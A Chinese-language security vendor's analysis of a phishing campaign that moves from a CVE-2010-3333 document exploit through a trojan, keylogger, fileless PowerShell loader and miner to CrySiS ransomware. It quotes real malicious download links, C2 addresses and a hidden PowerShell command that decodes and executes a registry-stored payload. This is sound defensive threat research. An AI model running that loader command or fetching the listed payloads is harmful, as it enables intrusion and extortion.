從某電商釣魚事件探索黑客“一站式服務”

黑客 · 發表 2018-11-20 09:53:40

摘要：深信服EDR安全團隊，整理分析了一起某電商釣魚事件，通過關聯資訊，發現背後可能存在一個“產業鏈齊全”的黑客團伙，研究發現其具備“一站式服務”的黑客攻擊手段。黑客攻擊手段包括但不限於釣魚郵件、漏洞利用、挖礦病毒、勒索病毒、無檔案攻擊、遠控木馬、鍵盤記錄器、密碼破解等，是一次完整而全套的“服...

深信服EDR安全團隊，整理分析了一起某電商釣魚事件，通過關聯資訊，發現背後可能存在一個“產業鏈齊全”的黑客團伙，研究發現其具備“一站式服務”的黑客攻擊手段。

黑客攻擊手段包括但不限於釣魚郵件、漏洞利用、挖礦病毒、勒索病毒、無檔案攻擊、遠控木馬、鍵盤記錄器、密碼破解等，是一次完整而全套的“服務”。

最開始，可能僅僅是一封精心構造的郵件觸發的，經過資訊收集和遠端控制，在閒時挖礦榨乾主機效能，當竊取到足夠機密，又最後“卸磨殺驢”“殺雞取卵”，執行勒索操作。

0x01 定向撒網撈魚：釣魚郵件

XX公司已經被黑客盯上了，黑客通過社工拿到該公司的各種郵件賬號，並給這些賬號傳送了釣魚郵件。

員工A收到一份郵件，這是一份包含了doc附件（實際上是一份富文字檔案）的郵件，doc名稱為TransferCopy.doc。

以下是郵件的基本資訊：

看上去是一份無害的檔案，點開檢視該doc，也未發現異常（但此時已經開始後臺偷偷執行）。

0x02 蒼蠅不叮無縫的蛋：漏洞利用

蒼蠅不叮無縫的蛋，一個普通的doc文件不能觸發什麼，但是，那是一個特殊構造的文件，裡面肯定利用了什麼漏洞的。

我們將郵件樣本中的Base64加密的附件b64EnTransferCopy.doc提取出來，檢測Base64解碼的b64DeTransferCopy.doc，發現了b64DeTransferCopy.doc文件中的特殊文字。

可以判斷其利用了CVE-2010-3333，漏洞溢位後，執行了下載動作。

在doc中發現惡意下載連結：

"http://polariton.rghost.ru/download/74zJT5wtf/b878e693051a8e541381b1d6378f4ddf62b d96b3/b878e693051a8e541381b1d6378f4ddf62bd96b3/b878e693051a8e541381b1d6378f 4ddf62bd96b3/DFGHDFGHJ4567856.exe"

訪問這個網址之後，會跳轉到http://rgho.st/74zJT5wtf?r=1088

0x03 偵查兵先行：下載木馬

滲透企業內網，免不了先偵查內部主機資訊的，黑客最開始，選擇了下載並執行木馬，完成初步的資訊收集和遠端控制。

我們將這個樣本下載下來，檢測為.NET程式，程式沒有加殼，但是經過了混淆。

通過De4dot反混淆得到如下資訊，但是程式還是存在一定的混淆，採用動態分析。

動態分析程式DFGHDFGHJ4567856.exe行為，發現其執行cmd命令 cmd.exe /c systeminfo 獲取系統基本資訊，寫入Info.txt。

釋放AutoUpdate.exe並通過設定登錄檔，設定其為自啟動，進行鍵鼠記錄，將所有的動作記錄在logs_xx.xx.xxxx(日期格式).htm檔案。

釋放鍵鼠記錄器pass.exe並啟動，進行密碼蒐集或者密碼破解。

該程式在完成所有釋放和啟動工作後，會使用HTTP協議連線惡意C2進行互動（回傳資訊）。

0x04 對抗升級：無檔案攻擊

為了進一步對抗安全產品，黑客並未停手，採取了更為高階、更為隱蔽的攻擊手段。

我們發現，其通過自啟動登錄檔項，啟動Shell/">PowerShell執行相應的命令

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -c "$val = (gp HKLM:SOFTWARE\'??').'??'; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"

分析上面的命令，它會讀取HKLM:SOFTWARE\'??'登錄檔項的內容，然後通過Base64解碼之後執行，另一個登錄檔項的內容是一串Base64的字串。

多次解碼之後，得到相應的PowerShell原始碼。

通過PowerShell指令碼，建立一個執行緒，注入一段ShellCode到遠端程序中，執行ShellCode，解密出相應的ShellCode程式碼。

通過InternetOpenA/InternetConnectA/HttpOpenRequestA/HttpSendRequestA等函式，連線或傳送網路請求到相應的黑客伺服器地址138.197.2.46

分配相應的記憶體空間，從黑客伺服器上讀取相關的惡意程式到記憶體。

從黑客伺服器上獲取到的檔案

ShellCode通過反射型DLL注入到程序執行

分析從記憶體中Dump出來的檔案，是一個後門程式。

後門程式，釋放相應的遠控惡意程式檔案Folder.exe

Folder.exe拷貝自身到C:\Users\panda\AppData\Roaming目錄下

並設定一個隱藏目錄的資料夾，將檔案拷貝到隱藏目錄資料夾下

並設定登錄檔自啟動項

將之前釋放到隱藏目錄下的副本遠控建立為計劃任務啟動項

黑客可以實時監控這臺主機，動態分析顯示其與遠端C2伺服器14.215.177.39地址進行通訊。

0x05 持續褥羊毛：挖礦

黑客在攻破該主機之後，就為該主機種上挖礦病毒，持續榨乾其效能。

0x06 豬養肥了就殺掉：執行勒索

在某天，黑客覺得資訊偷得差不多了，挖礦也挖了一段時間，想最後幹票大的。其通過遠端進來之後，從網站上下載了一個勒索病毒。

下載的網站如下：

http://polariton.rghost.ru/download/74QVXtyvn/5a32f4e1983822ed5d4fcedf2b8d4c276dd77263/5a32f4e1983822ed5d4fcedf2b8d4c276dd77263/Release.zip

執行下載後的程式，會加密主機上的檔案，如下所示：

並彈出勒索資訊介面，研究發現這是一個CrySiS勒索病毒。